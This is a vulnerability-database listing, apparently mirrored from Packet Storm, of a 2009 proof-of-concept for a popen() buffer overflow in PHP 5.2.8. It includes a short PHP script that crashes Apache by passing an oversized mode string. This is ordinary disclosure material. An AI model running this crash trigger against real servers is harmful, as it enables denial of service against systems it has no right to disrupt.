Lucene search

PHP 5.2.8 popen Overflow

🗓️ 12 Jan 2009 00:00:00Reported by e.wiZz!Type

packetstorm🔗 packetstormsecurity.com👁 19 Views

PHP popen function buffer overflow exploit for Apache 2.2.11/PHP 5.2.

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`Apache 2.2.11/PHP 5.2.8 Buffer Overflow Exploit (popen func)  
  
Type: Remote and Local  
  
Requirements for exploit: popen() enabled.  
  
  
By: e.wiZz! [email protected] najjaci.net  
  
  
PHP Popen() function overview:  
  
Popen function in php opens a pipe to a process executed by forking the command given by command.  
It was implementet since PHP 4 version.  
popen ( string $command_to_execute , string $mode )  
  
Second argument is vulnerable to buffer overflow.Reason why i mentioned Apache here,is because  
when we execute poc.php Apache HTTP server crash without any report in error log.You can test on WAMP too,on CLI or browser.  
  
  
Tested on: PHP 5.2.8/4.2.1/4.2.0  
Apache 2.2.11  
  
  
########### wild.php ################  
  
<?php  
$____buff=str_repeat("A",9999);  
$handle = popen('/whatever/', $____buff);  
echo $handle;  
?>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

12 Jan 2009 00:00Current

0.3Low risk

Vulners AI Score0.3